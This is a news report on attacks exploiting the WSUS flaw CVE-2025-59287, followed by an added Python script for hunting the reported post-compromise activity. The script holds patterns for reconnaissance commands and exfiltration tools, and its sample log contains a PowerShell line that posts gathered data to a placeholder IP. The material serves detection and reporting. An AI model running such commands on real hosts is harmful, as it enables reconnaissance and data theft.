A significant security threat has emerged as multiple organizations face attacks exploiting a serious vulnerability in Windows Server Update Services (WSUS), identified as CVE-2025-59287. This flaw, which allows remote code execution, is now under active exploitation shortly after Microsoft released an emergency patch, and the US Cybersecurity and Infrastructure Security Agency included it in its Known Exploited Vulnerabilities catalog.
Despite the urgency of the situation, Microsoft has not updated its guidance regarding this vulnerability to acknowledge the ongoing exploitation that has been reported by several reliable sources. The company continues to categorize CVE-2025-59287 as not publicly disclosed or exploited, although it does classify the likelihood of exploitation as “more likely,” a characterization that may underestimate the severity of the threat.
The Google Threat Intelligence Group (GTIG) indicated in communication with The Register that they are investigating the activities of a newly identified threat actor, referred to as UNC6512, which is targeting various victim organizations. According to GTIG, after gaining initial access, this actor has been seen executing a series of commands to gather information about the compromised systems and their environments, alongside exfiltrating data from affected hosts.
Microsoft has not provided a response to inquiries regarding the reported attacks, but it has noted that it typically refrains from updating security advisories after their release unless the initial information is found to be incorrect. The vulnerability affects Windows Server versions from 2012 to 2025 and arises from insecure deserialization of untrusted data, enabling unauthenticated attackers to execute arbitrary code on vulnerable systems. Servers lacking the WSUS role are not at risk.
Recent telemetry data reveals around 100,000 attempts to exploit this vulnerability in the past week alone. Microsoft initially addressed CVE-2025-59287 on October's Patch Tuesday; however, the patch proved insufficient, prompting an emergency update late last Thursday. Following the release of this emergency patch, cybersecurity teams and threat researchers began observing active exploitation attempts.
Dustin Childs, head of threat awareness at Trend Micro's Zero Day Initiative, stated that their scans indicate nearly 500,000 internet-facing servers have the WSUS service enabled. “Given the nature of the bug, we anticipate that nearly every affected server will experience attempts to exploit it,” he explained. He noted that the current exploitation appears to be indiscriminate, targeting a wide range of sectors and regions, and he expects the number of compromised systems to rise unless effective patches and mitigations are applied.
As of Monday, Palo Alto Networks' Unit 42 reported observing limited impacts on their customers. Justin Moore, a senior manager at Unit 42, pointed out that while WSUS is typically not exposed to the internet, instances where it is can lead to severe consequences for downstream entities. Their analysis suggests that the attackers are primarily focused on securing initial access and conducting reconnaissance within internal networks. The attackers are exploiting publicly accessible WSUS instances on their default TCP ports.
After breaching these systems, they execute PowerShell commands to gather information about the internal network, including commands like “whoami,” “net user /domain,” and “ipconfig /all.” The stolen data is then exfiltrated to a remote endpoint controlled by the attackers using PowerShell payloads that attempt to utilize Invoke-WebRequest or revert to curl.exe as necessary.
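As an added illustration of how a defender might hunt for the post-compromise activity described above (example code written for this page, not from the article, Unit 42 or Microsoft): a small Python triage script that scans process-creation records from WSUS hosts for the reported reconnaissance commands and the Invoke-WebRequest/curl.exe transfer tools, rating an event higher when both appear in one command line. The record layout, host names and sample command lines are constructed assumptions.

```python
import re
# Reconnaissance commands the article reports after compromise, and the transfer
# tools it reports for exfiltration (Invoke-WebRequest, falling back to curl.exe).
RECON_PATTERNS = {
    "whoami": re.compile(r"\bwhoami\b", re.I),
    "net_user_domain": re.compile(r"\bnet\s+user\s+/domain\b", re.I),
    "ipconfig_all": re.compile(r"\bipconfig\s+/all\b", re.I),
}
EXFIL_PATTERNS = {
    "invoke_webrequest": re.compile(r"\bInvoke-WebRequest\b|\biwr\b", re.I),
    "curl_exe": re.compile(r"\bcurl(\.exe)?\b", re.I),
}

def classify_command(cmdline):
    """Return (recon_hits, exfil_hits) found in one process command line."""
    recon = [name for name, pat in RECON_PATTERNS.items() if pat.search(cmdline)]
    exfil = [name for name, pat in EXFIL_PATTERNS.items() if pat.search(cmdline)]
    return recon, exfil

def parse_record(line):
    # Assumed record layout (constructed, not a real log format):
    # timestamp|host|parent_image|image|command_line
    ts, host, parent, image, cmd = line.rstrip("\n").split("|", 4)
    return {"ts": ts, "host": host, "parent": parent, "image": image, "cmd": cmd}

def scan_process_log(lines, wsus_hosts):
    """Flag events on WSUS hosts running the reported recon commands; rate 'high'
    when recon and an outbound transfer tool appear in the same command line."""
    alerts = []
    for line in lines:
        ev = parse_record(line)
        if ev["host"].lower() not in wsus_hosts:
            continue  # only hosts carrying the WSUS role are in scope here
        recon, exfil = classify_command(ev["cmd"])
        if not recon and not exfil:
            continue
        severity = "high" if recon and exfil else ("medium" if recon else "low")
        alerts.append({**ev, "recon": recon, "exfil": exfil, "severity": severity})
    return alerts

# Constructed sample records; host names, times and 203.0.113.10 are placeholders.
SAMPLE_LOG = [
    "2025-10-27T10:01:02Z|WSUS01|powershell.exe|whoami.exe|whoami",
    "2025-10-27T10:01:05Z|WSUS01|powershell.exe|net.exe|net user /domain",
    "2025-10-27T10:01:09Z|WSUS01|cmd.exe|powershell.exe|powershell -c \"ipconfig /all; "
    "Invoke-WebRequest -Uri http://203.0.113.10/u -Method Post -Body $out\"",
    "2025-10-27T10:02:00Z|WSUS01|services.exe|svchost.exe|svchost.exe -k netsvcs",
    "2025-10-27T10:03:00Z|FILE02|explorer.exe|cmd.exe|ipconfig /all",
]
```

Running `scan_process_log(SAMPLE_LOG, {"wsus01"})` returns three alerts for WSUS01 and ignores the unrelated file server; the same inventory of WSUS hosts is what a patch or isolation check would be driven from.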
Moore cautioned that despite the seemingly limited number of exposed WSUS servers, the low complexity of the attack could lead to significant downstream impacts that are difficult to quantify. Although there is currently no evidence linking a specific threat actor or group to the exploitation of this vulnerability, the availability of proof-of-concept exploits since at least October 21 raises concerns about opportunistic attackers taking advantage of the flaw.
Childs had previously warned that this vulnerability would likely attract the attention of malicious actors, and he expressed concern regarding the adequacy of the initial patch. “The fact that the initial patch was bypassed is troubling for multiple reasons,” he stated. “When a vulnerability is easy to exploit and a proof-of-concept is accessible, it becomes a target for opportunistic threat actors.” He emphasized the need for accountability in ensuring that patches not only address functionality but also effectively resolve documented security issues.
